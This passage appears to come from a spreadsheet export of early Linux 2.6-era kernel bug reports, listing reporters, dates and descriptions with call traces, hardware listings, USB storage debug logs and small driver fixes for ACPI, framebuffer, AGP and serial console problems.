mpage_writepages+0x170/0x276 [&lt;c01482b7&gt;] blkdev_writepage+0x0/0xc [&lt;c012ff40&gt;] do_writepages+0x1b/0x1d [&lt;c015a168&gt;] __sync_single_inode+0x9f/0x1aa [&lt;c015a43e&gt;] sync_sb_inodes+0x158/0x1c8 [&lt;c015a4d9&gt;] writeback_inodes+0x2b/0x3f [&lt;c012fe1c&gt;] wb_kupdate+0x8c/0xf4 [&lt;c0130245&gt;] __pdflush+0xc9/0x14b [&lt;c01302c7&gt;] pdflush+0x0/0xe [&lt;c01302d1&gt;] pdflush+0xa/0xe [&lt;c012fd90&gt;] wb_kupdate+0x0/0xf4 [&lt;c01081c0&gt;] kernel_thread_helper+0x0/0xb [&lt;c01081c5&gt;] kernel_thread_helper+0x5/0xb</t>
  </si>
  <si>
    <t>Tom Parker</t>
  </si>
  <si>
    <t>(two) warnings in fs/smbfs/inode.c</t>
  </si>
  <si>
    <t>2.6.0-test7-bk9</t>
  </si>
  <si>
    <t>2003-11-01 05:06 UTC</t>
  </si>
  <si>
    <t>2004-10-30 18:08 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo current Hardware Environment: Linux xinu 2.6.0-test7-bk9 #1 Sat Oct 18 00:43:04 CEST 2003 i686 Intel(R) Pentium(R) 4 CPU 2.40GHz GenuineIntel GNU/Linux Software Environment: gcc versie 3.3.2 20031022 (Gentoo Linux 3.3.2-r2, propolice) GNU ld version 2.14.90.0.6 20030820 as86 version: 0.16.13 Problem Description: Compiler warnings. CC fs/smbfs/inode.o fs/smbfs/inode.c: In function `smb_fill_super': fs/smbfs/inode.c:554: let op: comparison is always false due to limited range of data type fs/smbfs/inode.c:555: let op: comparison is always false due to limited range of data type Steps to reproduce: `make` using my config</t>
  </si>
  <si>
    <t>Steve</t>
  </si>
  <si>
    <t>memory allocated in non-sleeping context</t>
  </si>
  <si>
    <t>2003-11-01 16:44 UTC</t>
  </si>
  <si>
    <t>2004-03-13 21:28 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian/unstable Hardware Environment: Sony VAIO PCG R505GL Problem Description: Debug: sleeping function called from invalid context at mm/slab.c:1856 in_atomic():1, irqs_disabled():0 Call Trace: [&lt;c01212ac&gt;] __might_sleep+0xab/0xc9 [&lt;c0144bc1&gt;] __kmalloc+0x8f/0x96 [&lt;c0200eaa&gt;] acpi_os_allocate+0x10/0x14 [&lt;c0214758&gt;] acpi_ut_callocate+0x2f/0x73 [&lt;c020e213&gt;] acpi_ns_internalize_name+0x43/0x77 [&lt;c020db3a&gt;] acpi_ns_evaluate_relative+0x32/0xad [&lt;c020c529&gt;] acpi_hw_low_level_read+0x5e/0xa1 [&lt;c020c529&gt;] acpi_hw_low_level_read+0x5e/0xa1 [&lt;c020d49e&gt;] acpi_evaluate_object+0x103/0x1a5 [&lt;c02196c2&gt;] acpi_ec_query+0x9a/0xdd [&lt;c02197e6&gt;] acpi_ec_gpe_query+0xe1/0xf8 [&lt;c0206577&gt;] acpi_ev_gpe_dispatch+0x34/0x109 [&lt;c020643f&gt;] acpi_ev_gpe_detect+0xc2/0x110 [&lt;c0205013&gt;] acpi_ev_sci_xrupt_handler+0x13/0x1c [&lt;c0200fed&gt;] acpi_irq+0xf/0x1a [&lt;c010c591&gt;] handle_IRQ_event+0x39/0x62 [&lt;c0200fde&gt;] acpi_irq+0x0/0x1a [&lt;c010c943&gt;] do_IRQ+0xbe/0x197 [&lt;c010adac&gt;] common_interrupt+0x18/0x20 [&lt;c021bb7b&gt;] acpi_processor_idle+0xf5/0x1f1 [&lt;c011007b&gt;] alloc_ldt+0xef/0x1d1 [&lt;c0105000&gt;] _stext+0x0/0x67 [&lt;c01080c8&gt;] cpu_idle+0x36/0x3f [&lt;c04aa846&gt;] start_kernel+0x171/0x190 Steps to reproduce: Boot 2.6.0-test9 on above laptop, then go out for dinner. Had two of these on the display when we got back.</t>
  </si>
  <si>
    <t>ACPI disables self when started in T30 dock, works w/o dock</t>
  </si>
  <si>
    <t>2003-11-01 22:48 UTC</t>
  </si>
  <si>
    <t>Jonathan Thambidurai</t>
  </si>
  <si>
    <t>Distribution: Slackware Hardware Environment: T30 IBM Thinkpad Problem Description: ACPI doesn't work when T30 started in dock and acpiphp says "No new device found" when Thinkpad is inserted in dock Steps to reproduce: Start T30 in docking station</t>
  </si>
  <si>
    <t>Hrunting Johnson</t>
  </si>
  <si>
    <t>nosmp interrupt problems</t>
  </si>
  <si>
    <t>2.6.0-test9-mm1</t>
  </si>
  <si>
    <t>2003-11-03 19:54 UTC</t>
  </si>
  <si>
    <t>2003-11-05 15:52 UTC</t>
  </si>
  <si>
    <t>2xSMP PIII, booting an SMP kernel with nosmp parameter causes some interrupts to stop working: sound, usb, network. 00:00.0 Host bridge: VIA Technologies, Inc. VT82C693A/694x [Apollo PRO133x] (rev c4) 00:01.0 PCI bridge: VIA Technologies, Inc. VT82C598/694x [Apollo MVP3/Pro133x AGP] 00:07.0 ISA bridge: VIA Technologies, Inc. VT82C686 [Apollo Super South] (rev 40) 00:07.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT8233/A/C/VT8235 PIPC Bus Master IDE (rev 06) 00:07.2 USB Controller: VIA Technologies, Inc. USB (rev 1a) 00:07.3 USB Controller: VIA Technologies, Inc. USB (rev 1a) 00:07.4 SMBus: VIA Technologies, Inc. VT82C686 [Apollo Super ACPI] (rev 40) 00:07.5 Multimedia audio controller: VIA Technologies, Inc. VT82C686 AC97 Audio Controller (rev 50) 00:0a.0 Ethernet controller: National Semiconductor Corporation DP83815 (MacPhyter) Ethernet Controller 01:00.0 VGA compatible controller: nVidia Corporation NV5M64 [RIVA TNT2 Model 64/Model 64 Pro] (rev 15)</t>
  </si>
  <si>
    <t>sg driver will have problems on SAN environment</t>
  </si>
  <si>
    <t>all kernel levels</t>
  </si>
  <si>
    <t>2003-11-03 21:23 UTC</t>
  </si>
  <si>
    <t>Zhu Zhu</t>
  </si>
  <si>
    <t>2007-03-12 10:09 UTC</t>
  </si>
  <si>
    <t>Distribution:all RedHat and SuSE distributions Hardware Environment: IA-32, IA-64, pSeries and zSeries Software Environment: Problem Description:1. The flags on open() function do not work properly. The flags of O_EXCL and/or O_NONBLOCK or-ed with O_RDWR do not have any effect on the multi-open for the same file. When an application calls sg</t>
  </si>
  <si>
    <t>cpufreq</t>
  </si>
  <si>
    <t>2011-07-30 05:08 UTC</t>
  </si>
  <si>
    <t>Hideaki YOSHIFUJI</t>
  </si>
  <si>
    <t>atyfb: garbled text when overdrawing</t>
  </si>
  <si>
    <t>2003-11-05 02:26 UTC</t>
  </si>
  <si>
    <t>Filip Van Raemdonck</t>
  </si>
  <si>
    <t>2005-08-15 17:35 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sid (unstable) Hardware Environment: PIII-450, Ati Rage Pro Software Environment: Console framebuffer Problem Description: Framebuffer console has garbled text whenever something needs to be redrawn over (different) existing content, e.g. when doing history browsing in bash using arrow-up, or when doing reverse-i-search in bash (ctrl+r), or when using curses/slang applications. I've even seen stale old text being left on the top row when doing ctrl+l. It seems to be mostly (but not entirely - from time to time there is also a one character up/down/left/right shift added to the other symptom) a problem of things not being cleared correctly. Note that the problem does not occur when new output is appended at the bottom of the screen; such text is drawn correctly. However, when doing so, if there is garbage somewhere on the screen, that garbage is scrolled up line by line as normal text is. I boot with video=atyfb:1024x768-8@60 (as stty seems to have a problem resizing, see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=218442) Atyfb initializes as follows: atyfb: 3D RAGE PRO (BGA, AGP) [0x4742 rev 0x7c] 8M SDRAM, 14.31818 MHz XTAL, 230 MHz PLL, 100 Mhz MCLK I tried making a screenshot with fbgrab but that failed because it doesn't support 8-bit depth. If there's another way, and you want a screenshot, please tell me how.</t>
  </si>
  <si>
    <t>machine locks up while accessing NIC</t>
  </si>
  <si>
    <t>2.5.72...2.6-current</t>
  </si>
  <si>
    <t>2003-11-05 12:26 UTC</t>
  </si>
  <si>
    <t>2004-12-07 15:14 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian/GNU Linux (powerpc) Hardware Environment: PReP Utah (Powerstack II Pro4000) Software Environment: Gnu C 3.3.2 Gnu make 3.80 util-linux 2.12 mount 2.12 module-init-tools 0.9.15-pre3 e2fsprogs 1.35-WIP jfsutils 1.1.3 nfs-utils 1.0.6 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.1.14 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.0.91 Problem Description: see http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=106735412521952&amp;w=2 2 NICs, both working with 2.4.xx, under 2.6.0-test{6...9} machine locks up, when the NICs is going to be configured. Steps to reproduce: "modprobe tulip" or "modprobe 3c59x" is ok, even "ifconfig eth0" is showing an (unconfigured) eth0 then. but configuring locks the machine up. (no oops msg)</t>
  </si>
  <si>
    <t>iasl -d coredumps on ia64 platform</t>
  </si>
  <si>
    <t>2.6.58</t>
  </si>
  <si>
    <t>2003-11-05 12:51 UTC</t>
  </si>
  <si>
    <t>2006-09-28 13:11 UTC</t>
  </si>
  <si>
    <t>Distribution: FreeBSD Hardware Environment: ia64 Software Environment: ACPICA Problem Description: Running iasl -d on a DSDT generates a coredump on our ia64 platform. This was reported by Marcel Moolenaar &lt;marcel@xcllnt.net&gt;. He has fixed it with the following patch: Index: dmresrc.c =================================================================== RCS file: /home/ncvs/src/sys/contrib/dev/acpica/dmresrc.c,v retrieving revision 1.1.1.4 diff -u -r1.1.1.4 dmresrc.c --- dmresrc.c 13 Jul 2003 22:41:22 -0000 1.1.1.4 +++ dmresrc.c 5 Nov 2003 06:15:47 -0000 @@ -435,7 +435,7 @@ /* The list must have a valid END_TAG */ - if (ByteData[ByteCount-2] != (ACPI_RDESC_TYPE_END_TAG | 1)) + if (ByteData[ByteCount-1] != (ACPI_RDESC_TYPE_END_TAG | 1)) { return FALSE; } This bug affects i386 platforms too but the pointer dereference isn't fatal there. We have imported this fix in FreeBSD-current.</t>
  </si>
  <si>
    <t>Juan Pedro Paredes Caballero</t>
  </si>
  <si>
    <t>kernel panic when i unplug the ac adaptor on a laptop .</t>
  </si>
  <si>
    <t>2.6-test9</t>
  </si>
  <si>
    <t>2003-11-07 06:15 UTC</t>
  </si>
  <si>
    <t>kakaouete</t>
  </si>
  <si>
    <t>2004-03-05 11:55 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sid Hardware Environment: Laptop, Toshiba satellite 3000-x4 Software Environment: Debian sid, whith the last upgrades. kernel 2.6-test9 Problem Description: When i unplug the ac adaptator of my laptop, i get a looot of information about acpi who is becoming mad ! and i get a kernel panic. i have compiled the acpi components not as module. my explanatin is not very .. . hm ... good, but it's all i can do. Steps to reproduce: just unplug the ac adaptator :P</t>
  </si>
  <si>
    <t>boot panic on Tyan 2707 if acpi enabled</t>
  </si>
  <si>
    <t>2.4.23-pre7</t>
  </si>
  <si>
    <t>2003-11-07 15:12 UTC</t>
  </si>
  <si>
    <t>2004-03-04 12:40 UTC</t>
  </si>
  <si>
    <t>Distribution:Custom Hardware Environment:Tyan 2707 Software Environment:Booted via pxelinux Problem Description: System fail to boot with ACPI enabled. Steps to reproduce:Compile kernel with ACPI support and boot a 2707.</t>
  </si>
  <si>
    <t>vesa fb conflicts with vga 16</t>
  </si>
  <si>
    <t>2003-11-08 02:33 UTC</t>
  </si>
  <si>
    <t>Thomas Stover</t>
  </si>
  <si>
    <t>Hardware Environment: Athlon XP laptop, S3 VT8636 video chipset Software Environment: passing boot options with lilo Steps to reproduce: Include both the vga 16 and the vesa fb drivers. Boot without any vga= options, and vga16 works fine. Then boot with a vga=video mode and it boots with scrabled video. It looks like its trying to write graphics to the vga16 driver. If you compile without the vga16 everything works fine. This condition is not present in 2.4.20</t>
  </si>
  <si>
    <t>Framebuffer driver doesn't load on systems with &gt; 1G memor (radeon, nvidia)</t>
  </si>
  <si>
    <t>2.4.20, 2.6.0-test[1-9]</t>
  </si>
  <si>
    <t>2003-11-08 11:25 UTC</t>
  </si>
  <si>
    <t>C.J. Collier</t>
  </si>
  <si>
    <t>2004-12-12 09:42 UTC</t>
  </si>
  <si>
    <t>Luca Tettamanti</t>
  </si>
  <si>
    <t>Distribution: OS: Debian sid Hardware Environment: 2 x 512M corsair 333Mhz # lspci 00:00.0 Host bridge: nVidia Corporation nForce2 AGP (different version?) (rev c1) 00:00.1 RAM memory: nVidia Corporation nForce2 Memory Controller 1 (rev c1) 00:00.2 RAM memory: nVidia Corporation nForce2 Memory Controller 4 (rev c1) 00:00.3 RAM memory: nVidia Corporation nForce2 Memory Controller 3 (rev c1) 00:00.4 RAM memory: nVidia Corporation nForce2 Memory Controller 2 (rev c1) 00:00.5 RAM memory: nVidia Corporation nForce2 Memory Controller 5 (rev c1) 00:01.0 ISA bridge: nVidia Corporation nForce2 ISA Bridge (rev a3) 00:01.1 SMBus: nVidia Corporation nForce2 SMBus (MCP) (rev a2) 00:02.0 USB Controller: nVidia Corporation nForce2 USB Controller (rev a3) 00:02.1 USB Controller: nVidia Corporation nForce2 USB Controller (rev a3) 00:02.2 USB Controller: nVidia Corporation nForce2 USB Controller (rev a3) 00:04.0 Ethernet controller: nVidia Corporation nForce2 Ethernet Controller (rev a1) 00:05.0 Multimedia audio controller: nVidia Corporation nForce MultiMedia audio [Via VT82C686B] (rev a2) 00:06.0 Multimedia audio controller: nVidia Corporation nForce2 AC97 Audio Controler (MCP) (rev a1) 00:08.0 PCI bridge: nVidia Corporation nForce2 External PCI Bridge (rev a3) 00:09.0 IDE interface: nVidia Corporation nForce2 IDE (rev a2) 00:0d.0 FireWire (IEEE 1394): nVidia Corporation nForce2 FireWire (IEEE 1394) Controller (rev a3) 00:1e.0 PCI bridge: nVidia Corporation nForce2 AGP (rev c1) 01:09.0 Ethernet controller: National Semiconductor Corporation DP83815 (MacPhyter) Ethernet Controller 01:0a.0 Multimedia audio controller: Creative Labs SB Live! EMU10k1 (rev 08) 01:0a.1 Input device controller: Creative Labs SB Live! MIDI/Game Port (rev 08) 02:00.0 VGA compatible controller: ATI Technologies Inc Radeon R200 QM [Radeon 9100] # cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 10 model name : AMD Athlon(tm) XP 2500+ stepping : 0 cpu MHz : 1830.349 cache size : 512 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse syscall mmxext 3dnowext 3dnow bogomips : 3620.86 Software Environment: as little as booting single-user mode and modprobing. Note that I get the same errors when compiling the driver in to the kernel. Problem Description: radeonfb_pci_register BEGIN radeonfb: ref_clk=2700, ref_div=12, xclk=20000 from BIOS radeonfb: probed DDR SGRAM 131072k videoram radeon_get_moninfo: bios 4 scratch = 2000002 radeonfb: cannot map FB Steps to reproduce: Place 2 sticks of 512M memory in system enter 'linux 1' at boot prompt ... wait ... modprobe radeonfb # or nvidia dmesg | tail</t>
  </si>
  <si>
    <t>AGP not working on an EPOX 8RDA3+</t>
  </si>
  <si>
    <t>2003-11-10 03:28 UTC</t>
  </si>
  <si>
    <t>Bernhard Stegmaier</t>
  </si>
  <si>
    <t>2004-04-06 12:35 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo (stable tree, all packages up-to-date) Hardware Environment: Epox 8RDA3+ (nForce2), AMD Athlon XP 2500+, 512MB, Radeon 9600pro Software Environment: X 4.3.0, ATI fglrx driver, kernel builtin AGP for nforce2 Problem Description: AGP not working on this board (others have this problem, too. Some posts can be found in the forums at www.nforcershq.com and www.gentoo.org). AGP is working fine with the latest 2.4 kernels (.22 and .23-pre5 tested). With none of the 2.6.0-test? kernels I managed to get AGP working on this board (but it obviously does work on other nforce2 boards). If I run testgart I get useless information (e.g., memory bandwith 0MB/s and many other zeros... the only thing that seems to work is the detection of the AGP aperture size). If I try to start X the computer simply freezes without any further error messages (on the console or in the logs). If any further information (e.g., exact output of testgart, etc.) is required, I will provide it (and I am willing to do furhter tests, etc., if necessary). Steps to reproduce: -</t>
  </si>
  <si>
    <t>axis not working on IBM USB Gamepad</t>
  </si>
  <si>
    <t>2.6.1</t>
  </si>
  <si>
    <t>2003-11-11 00:36 UTC</t>
  </si>
  <si>
    <t>Josh Attoun</t>
  </si>
  <si>
    <t>2004-01-23 15:31 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo Hardware Environment: athlon xp 2500+ (underclocked to 1900+) syntax k7S746FX motherboard more relevant, though is the IBM USB Gamepad. There's no real info on it on the net, although if you look on IBM's website, you'll find a link to buy it. the problem is only the left and up directions on the gamepad work. In programs like zsnes where you can remap the input, you can get it to work (although it caused my kernel to crash occasionally???). Software Environment: linux-2.6.0-test9, gcc 2.95.3 Problem Description: here's the relevant output of /proc/bus/usb/devices: T: Bus=02 Lev=01 Prnt=01 Port=01 Cnt=01 Dev#= 2 Spd=1.5 MxCh= 0 D: Ver= 1.00 Cls=00(&gt;ifc ) Sub=00 Prot=00 MxPS= 8 #Cfgs= 1 P: Vendor=0433 ProdID=1101 Rev= 3.05 C:* #Ifs= 1 Cfg#= 1 Atr=80 MxPwr= 60mA I: If#= 0 Alt= 0 #EPs= 1 Cls=03(HID ) Sub=00 Prot=00 Driver=hid E: Ad=81(I) Atr=03(Int.) MxPS= 4 Ivl=8ms Steps to reproduce: Plug it in, fire up a game, watch it not work right. I found a fix. You have to add the vendor and device id to drivers/usb/input/hid-core.c and add the HID_QUIRK_BADPAD to the hid_blacklist structure. Not sure how correct the fix is, but since using it, I've had no problems. Here's what I added. #define USB_VENDOR_ID_IBM 0x0433 #define USB_DEVICE_ID_IBM_GAMEPAD 0x1101 . . . { USB_VENDOR_ID_IBM, USB_DEVICE_ID_IBM_GAMEPAD, HID_QUIRK_BADPAD }, { 0, 0 }</t>
  </si>
  <si>
    <t>8250 console and pmac_zilog console can not coexist</t>
  </si>
  <si>
    <t>2003-11-11 15:04 UTC</t>
  </si>
  <si>
    <t>2007-10-14 04:31 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE Linux Hardware Environment: PowerMac 7200, 2 pmac serial lines, no 8250/16550 lines Software Environment: gcc3.2.3 Problem Description: ppc32 has a socalled common config which includes drivers for PC style hardware, used on PReP and CHRP systems, and drivers for Macintosh (CONFIG_ALL_PPC in 2.4). this includes also drivers for serial console. CONFIG_SERIAL_8250_CONSOLE=y CONFIG_SERIAL_CORE_CONSOLE=y CONFIG_SERIAL_PMACZILOG_CONSOLE=y This config fails to open /dev/console in init/main.c, call trace is: sys_open -&gt; filp_open -&gt; dentry_open -&gt; chrdev_open -&gt; tty_open -&gt; init_dev driver-&gt;ttys contains NULL. The struct tty_driver passed to init_dev() is allocated in the 8250 driver: ... Serial: 8250/16550 driver $Revision: 1.90 $ 8 ports, IRQ sharing disabled uart_register_driver: c0322d58 alloc_tty_driver: d c470de00 uart_register_driver: c0324388 alloc_tty_driver: d c470dc00 Using anticipatory io scheduler ... VFS: Mounted root (ext2 filesystem) readonly. Freeing unused kernel memory:&lt;7&gt;IN from bad port 3f9 at c0160600 184k init&lt;7&gt;IN from bad port 3f9 at c0160600 4k chrp&lt;7&gt;IN from bad port 3f9 at c0160600 36k prep&lt;7&gt;IN from bad port 3f9 at c0160600 kobj_lookup: owner 00000000 data c04166e4 probe c006822c init_dev: d c470dc00 i 0 Serial port locked ON by debugger ! vector: 301 at pc = c0148254, lr = c0148250 msr = 9030, sp = c47b1dc0 [c47b1d10] dar = 0, dsisr = 40000000 current = c47af740, pid = 1, comm = swapper ... The 2.4 kernel has some workaround to shift the minor numbers for the 8250 driver: drivers/char/serial.c:#define SERIAL_DEV_OFFSET ((_machine == _MACH_prep || _machine == _MACH_chrp) ? 0 : 2) Maybe something similar is required also for 2.6? I fail to see how to apply the SERIAL_DEV_OFFSET scheme to 2.6. One thing to note, all these "&lt;7&gt;IN from bad port 3f9 at c0160600" may indicate that the 8250 probing is not yet done. Steps to reproduce: compile a kernel with the config above and boot it on an oldworld powermac. it will die while opening /dev/console</t>
  </si>
  <si>
    <t>SuSE 9.0 AMD x86-64 Beta 3 build</t>
  </si>
  <si>
    <t>2003-11-11 22:24 UTC</t>
  </si>
  <si>
    <t>Hurry Lin</t>
  </si>
  <si>
    <t>2004-05-20 21:06 UTC</t>
  </si>
  <si>
    <t>Distribution: VIA K8 system Hardware Environment: K8 CPU + VIA platform Software Environment: Problem Description: Now we meet a installation issue in APIC mode when we install SuSe 9.0 beta 3 on VIA platform. In ACPI part of BIOS, each interrupt pin (i.e. INTA, INTB, INTC, INTD ) of the device will get a assigned IRQ when we will claim device's IRQ routing on _PRT device configuration object. If interrupt pins of the device is dynamically decided IRQ through device object, then the system will hang during installation after _CRS control method is executed by OS on the refered device object and the current IRQ is returned. If we directly assign IRQ number to each interrupt pin of the device, the installation is OK. We think some problems on ACPI parsing duing installation. We also find another problem about the behavior of different OS version. For SuSe 9.0 beta 3, the devices can operate in APIC mode (above IRQ 16) when we directly assign IRQ number to each interrupt pin of the device. The system will hang when interrupt pins of the device is dynamically decided IRQ through device object. For SuSe 9.0 beta 6 and final version, the device always only operate in PIC mode. Customers can't accept our chipset that the IRQ routing of the devices is limited operated in PIC mode. We hope the IRQ routing results of the PCI devices to go back SuSe 9.0 beta 3 for future SuSe OS version. Let our platform operate in APIC mode. We have at least chance to operate in APIC mode for VIA chipset when interrupt pins of the device is directly assigned to IRQ number. Steps to reproduce: CRT is Black Screen after we select "Installation" to install SuSe 9.0 beta 6.</t>
  </si>
  <si>
    <t>Unalignment access</t>
  </si>
  <si>
    <t>Lastest 2.4 ia64 + Latest ACPI</t>
  </si>
  <si>
    <t>2003-11-12 21:32 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: 4 way 800M Itanium, Lion Software Environment: Lastest 2.4 ia64 + Latest ACPI Problem Description: kernel unaligned access to 0xe000000004c2f199, ip=0xe000000004615fb1 Steps to reproduce: Press power button</t>
  </si>
  <si>
    <t>Correct IRQ attribute returned from PRS or CRS</t>
  </si>
  <si>
    <t>2.4/2.6</t>
  </si>
  <si>
    <t>2003-11-13 04:16 UTC</t>
  </si>
  <si>
    <t>2004-03-03 22:04 UTC</t>
  </si>
  <si>
    <t>According to ACPI spec, the Byte 3 of IRQ descriptor can only be programed to Active-High-Edge-Trigged or Active-Low-Level-Trigged. Current implementation will leave break this rule, if Active-Low-Hight-Level-Trigged returned from _PRS.</t>
  </si>
  <si>
    <t>sony DSC-S30 fails to mount</t>
  </si>
  <si>
    <t>2003-11-13 04:40 UTC</t>
  </si>
  <si>
    <t>brendan sergei</t>
  </si>
  <si>
    <t>2005-07-17 21:31 UTC</t>
  </si>
  <si>
    <t>Distribution:Mandrake 9.1 Hardware Environment:450 mhtz amd k6-2 384 mb ram ohci usb controller 64 mb memory stick useing on-camera reader Software Environment: Problem Description:when i try to mount the camera it says it is not a block device kernel messages: sb-storage: Command READ_CAPACITY (10 bytes) usb-storage: 25 00 00 00 00 00 00 00 00 00 usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=10 usb-storage: Status code 0; transferred 10/10 usb-storage: -- transfer complete usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: usb_stor_bulk_transfer_buf: xfer 8 bytes usb-storage: Status code 0; transferred 8/8 usb-storage: -- transfer complete usb-storage: CB data stage result is 0x0 usb-storage: -- CB transport device requiring auto-sense usb-storage: Issuing auto-REQUEST_SENSE usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=6 usb-storage: Status code 0; transferred 6/6 usb-storage: -- transfer complete usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: usb_stor_bulk_transfer_buf: xfer 18 bytes usb-storage: Status code 0; transferred 18/18 usb-storage: -- transfer complete usb-storage: CB data stage result is 0x0 usb-storage: -- Result from auto-sense is 0 usb-storage: -- code: 0x70, key: 0x0, ASC: 0x0, ASCQ: 0x0 usb-storage: (Unknown Key): (unknown ASC/ASCQ) usb-storage: scsi cmd done, result=0x0 SCSI device sda: 126848 512-byte hdwr sectors (65 MB) usb-storage: queuecommand called usb-storage: *** thread sleeping. usb-storage: *** thread awakened. usb-storage: Command MODE_SENSE_10 (10 bytes) usb-storage: 5a 00 3f 00 00 00 00 00 08 00 usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=10 usb-storage: Status code 0; transferred 10/10 usb-storage: -- transfer complete usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: usb_stor_bulk_transfer_buf: xfer 8 bytes usb-storage: Status code -75; transferred 8/8 usb-storage: -- babble usb-storage: CB data stage result is 0x3 usb-storage: -- transport indicates error, resetting usb-storage: usb_stor_CB_reset called usb-storage: usb_stor_control_msg: rq=00 rqtype=21 value=0000 index=00 len=12 usb-storage: Soft reset failed: -32 usb-storage: scsi cmd done, result=0x70000 usb-storage: *** thread sleeping. usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Command MODE_SENSE_10 (10 bytes) usb-storage: 5a 00 3f 00 00 00 00 00 08 00 usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=10 usb-storage: Status code 0; transferred 10/10 usb-storage: -- transfer complete usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: usb_stor_bulk_transfer_buf: xfer 8 bytes usb-storage: Status code -75; transferred 8/8 usb-storage: -- babble usb-storage: CB data stage result is 0x3 usb-storage: -- transport indicates error, resetting usb-storage: usb_stor_CB_reset called usb-storage: usb_stor_control_msg: rq=00 rqtype=21 value=0000 index=00 len=12 usb-storage: Soft reset failed: -32 usb-storage: scsi cmd done, result=0x70000 usb-storage: *** thread sleeping. usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Command MODE_SENSE_10 (10 bytes) usb-storage: 5a 00 3f 00 00 00 00 00 08 00 usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=10 usb-storage: Status code 0; transferred 10/10 usb-storage: -- transfer complete usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: usb_stor_bulk_transfer_buf: xfer 8 bytes usb-storage: Status code -75; transferred 8/8 usb-storage: -- babble usb-storage: CB data stage result is 0x3 usb-storage: -- transport indicates error, resetting usb-storage: usb_stor_CB_reset called usb-storage: usb_stor_control_msg: rq=00 rqtype=21 value=0000 index=00 len=12 usb-storage: Soft reset failed: -32 usb-storage: scsi cmd done, result=0x70000 usb-storage: *** thread sleeping. usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Command MODE_SENSE_10 (10 bytes) usb-storage: 5a 00 3f 00 00 00 00 00 08 00 usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=10 usb-storage: Status code 0; transferred 10/10 usb-storage: -- transfer complete usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: usb_stor_bulk_transfer_buf: xfer 8 bytes usb-storage: Status code -75; transferred 8/8 usb-storage: -- babble usb-storage: CB data stage result is 0x3 usb-storage: -- transport indicates error, resetting usb-storage: usb_stor_CB_reset called usb-storage: usb_stor_control_msg: rq=00 rqtype=21 value=0000 index=00 len=12 usb-storage: Soft reset failed: -32 usb-storage: scsi cmd done, result=0x70000 usb-storage: *** thread sleeping. usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Command MODE_SENSE_10 (10 bytes) usb-storage: 5a 00 3f 00 00 00 00 00 08 00 usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=10 usb-storage: Status code 0; transferred 10/10 usb-storage: -- transfer complete usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: usb_stor_bulk_transfer_buf: xfer 8 bytes usb-storage: Status code -75; transferred 8/8 usb-storage: -- babble usb-storage: CB data stage result is 0x3 usb-storage: -- transport indicates error, resetting usb-storage: usb_stor_CB_reset called usb-storage: usb_stor_control_msg: rq=00 rqtype=21 value=0000 index=00 len=12 usb-storage: Soft reset failed: -32 usb-storage: scsi cmd done, result=0x70000 usb-storage: *** thread sleeping. sda: Write Protect is off sda: Mode Sense: 00 32 00 00 sda: assuming drive cache: write through usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Command ALLOW_MEDIUM_REMOVAL (6 bytes) usb-storage: 1e 00 00 00 01 00 usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=6 usb-storage: Status code -32; transferred 6/6 usb-storage: -- stall on control pipe usb-storage: Call to usb_stor_ctrl_transfer() returned 2 usb-storage: -- CB transport device requiring auto-sense usb-storage: -- transport indicates command failure usb-storage: Issuing auto-REQUEST_SENSE usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=6 usb-storage: Status code 0; transferred 6/6 usb-storage: -- transfer complete usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: usb_stor_bulk_transfer_buf: xfer 18 bytes usb-storage: Status code 0; transferred 18/18 usb-storage: -- transfer complete usb-storage: CB data stage result is 0x0 usb-storage: -- Result from auto-sense is 0 usb-storage: -- code: 0x70, key: 0x5, ASC: 0x20, ASCQ: 0x0 usb-storage: (Unknown Key): (unknown ASC/ASCQ) usb-storage: scsi cmd done, result=0x2 usb-storage: *** thread sleeping. usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Command TEST_UNIT_READY (6 bytes) usb-storage: 00 00 00 00 00 00 usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=6 usb-storage: Status code 0; transferred 6/6 usb-storage: -- transfer complete 